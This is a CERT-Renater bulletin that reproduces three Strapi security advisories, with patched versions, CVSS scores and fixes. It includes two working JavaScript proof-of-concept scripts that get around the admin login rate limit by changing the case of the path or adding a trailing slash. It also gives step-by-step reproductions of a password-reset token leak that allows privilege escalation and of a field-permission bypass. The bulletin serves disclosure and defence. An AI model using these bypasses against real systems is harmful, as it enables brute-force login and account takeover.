===================================================================== CERT-Renater Note d'Information No. 2023/VULN331 _____________________________________________________________________ DATE : 20/09/2023 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running strapi/plugin-users-permissions, strapi/admin, strapi/plugin-content-manager versions prior to 4.12.1, strapi/admin, strapi/plugin-content-manager, strapi/utils versions prior to 4.11.7. ===================================================================== https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r https://github.com/strapi/strapi/security/advisories/GHSA-v8gg-4mq2-88q4 https://github.com/strapi/strapi/security/advisories/GHSA-m284-85mf-cgrc _____________________________________________________________________ Improper Rate Limiting High alexandrebodin published GHSA-24q2-59hm-rh9r Sep 13, 2023 Package @strapi/admin (npm) Affected versions <= 4.12.0 Patched versions >= 4.12.1 @strapi/plugin-users-permissions (npm) <= 4.12.0 >= 4.12.1 Description 1. Summary There is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it. 2. Details It is possible to avoid this by modifying the rate-limited request path as follows. Manipulating request paths to upper or lower case. (Pattern 1) In this case, avoidance is possible with various patterns. Add path slashes to the end of the request path. (Pattern 2) 3. PoC Access the administrator's login screen (/admin/auth/login) and execute the following PoC on the browser's console screen. Pattern 1 (uppercase and lowercase) // poc.js (async () => { const data1 = { email: "admin@strapi.com", // registered e-mail address password: "invalid_password", }; const data2 = { email: "admin@strapi.com", password: "RyG5z-CE2-]*4e4", // correct password }; for (let i = 0; i < 30; i++) { await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data1), headers: { "Content-Type": "application/json", }, }); } const res1 = await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res1.status + " " + res1.statusText); const res2 = await fetch("http://localhost:1337/admin/Login", { // capitalize part of path method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res2.status + " " + res2.statusText); })(); This PoC does the following: Request 30 incorrect logins. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (429 Too Many Requests) Next, falsify the pathname of the request (/admin/Login) and make a request again to confirm that it is possible to bypass the rate limit and log in. (200 OK) Pattern 2 (trailing slash) // poc.js (async () => { const data1 = { email: "admin@strapi.com", // registered e-mail address password: "invalid_password", }; const data2 = { email: "admin@strapi.com", password: "RyG5z-CE2-]*4e4", // correct password }; for (let i = 0; i < 30; i++) { await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data1), headers: { "Content-Type": "application/json", }, }); } const res1 = await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res1.status + " " + res1.statusText); const res2 = await fetch("http://localhost:1337/admin/login/", { // trailing slash method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res2.status + " " + res2.statusText); })(); This PoC does the following: Request 30 incorrect logins. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (429 Too Many Requests) Next, falsify the pathname of the request (/admin/login/) and make a request again to confirm that it is possible to bypass the rate limit and log in. (200 OK) PoC Video PoC Video 4. Impact It is possible to bypass the rate limit of the login function of the admin screen. Therefore, the possibility of unauthorized login by login brute force attack increases. 5. Measures Forcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (ctx.request.path) Also, remove any extra slashes in the request path. strapi/packages/core/admin/server/middlewares/rateLimit.js Line 31 in 32d68f1 prefixKey: `${userEmail}:${ctx.request.path}:${ctx.request.ip}`, 6. References OWASP: API2:2023 Broken Authentication OWASP: Authentication Cheat Sheet OWASP: Denial of Service Cheat Sheet (Rate limiting) Severity High 7.3/ 10 CVSS base metrics Attack vector Network Attack complexity Low Privileges required None User interaction None Scope Unchanged Confidentiality Low Integrity Low Availability Low CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L CVE ID CVE-2023-38507 Weaknesses CWE-307 Credits @scgajge12 scgajge12 Reporter @derrickmehaffy derrickmehaffy Remediation developer @innerdvations innerdvations Remediation reviewer @alexandrebodin alexandrebodin Remediation reviewer _____________________________________________________________________ Leaking sensitive user information, user reset password, tokens via content-manager views Moderate alexandrebodin published GHSA-v8gg-4mq2-88q4 Package @strapi/admin (npm) Affected versions <= 4.11.6 Patched versions >= 4.11.7 @strapi/plugin-content-manager (npm) <= 4.11.6 >= 4.11.7 @strapi/utils (npm) <= 4.11.6 >= 4.11.7 Description Summary I can get access to user reset password tokens if I have the configure view permissions b37a6fd9eae06027e7d91266f1908a3d Details /content-manager/relations route does not remove private fields or ensure that they can't be selected PoC Install fresh strapi instance start up strapi and create an account create a new content-type give the content-type a relation with admin users and save go to Admin panel roles Author and then plugins. Enable for content-manager collection types the configure view In the collection time now only give them access to the collection you created for this. Create a new admin user account with the Author role Log out and request a password reset for the main admin user. Login on the newly created account go to the collection type you created for this test and click the create new entry button, click in the create new entry view on configure view. select the admin user relation we created click on resetPasswordToken Now go back to the create an entry view and when selection the relation we created we now see the reset tokken Impact Impact is that the none admin user now has the reset token of the admin users account and can resets its password using that to escalate his privilege's Still you need the configure view permission to be able to escalate your privilege's Severity Moderate 5.8/ 10 CVSS base metrics Attack vector Network Attack complexity High Privileges required Low User interaction Required Scope Changed Confidentiality High Integrity None Availability None CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N CVE ID CVE-2023-36472 Weaknesses No CWEs Credits @Boegie19 Boegie19 Reporter @derrickmehaffy derrickmehaffy Remediation verifier @alexandrebodin alexandrebodin Remediation developer _____________________________________________________________________ Field level permissions not being respected in relationship title Low alexandrebodin published GHSA-m284-85mf-cgrc Package @strapi/plugin-content-manager (npm) Affected versions <= 4.12.0 Patched versions >= 4.12.1 Description Summary Field level permissions not being respected in relationship title. If I have a relationship title and the relationship shows a field I don't have permission to see I will still be visible. Details No RBAC checks on on the relationship the relation endpoint returns PoC Setup Create a fresh strapi instance Create a new content type in the newly created content type add a relation to the users-permissions user. Save. Create a users-permissions user Use your created content type and create an entry in it related to the users-permisisons user Go to settings -> Admin panel -> Roles -> Author Give the author role full permissions on the content type your created. Make sure they don't have any permission to see User Save Create a new admin account with only the author role CVE login on the newly created author acount. go to the content manager to the colection type you created with the relationship to users_permissions_user You now see a field you don't have permissions to view. Impact RBAC field level checks leaks data selected by the admin user as relationship title What could be sensitive fields that they should not be allowed to see. by the person having this specific role. Severity Low 2.4/ 10 CVSS base metrics Attack vector Network Attack complexity Low Privileges required High User interaction Required Scope Unchanged Confidentiality Low Integrity None Availability None CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N CVE ID CVE-2023-37263 Weaknesses No CWEs Credits @Boegie19 Boegie19 Reporter @derrickmehaffy derrickmehaffy Remediation verifier @alexandrebodin alexandrebodin Remediation developer ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================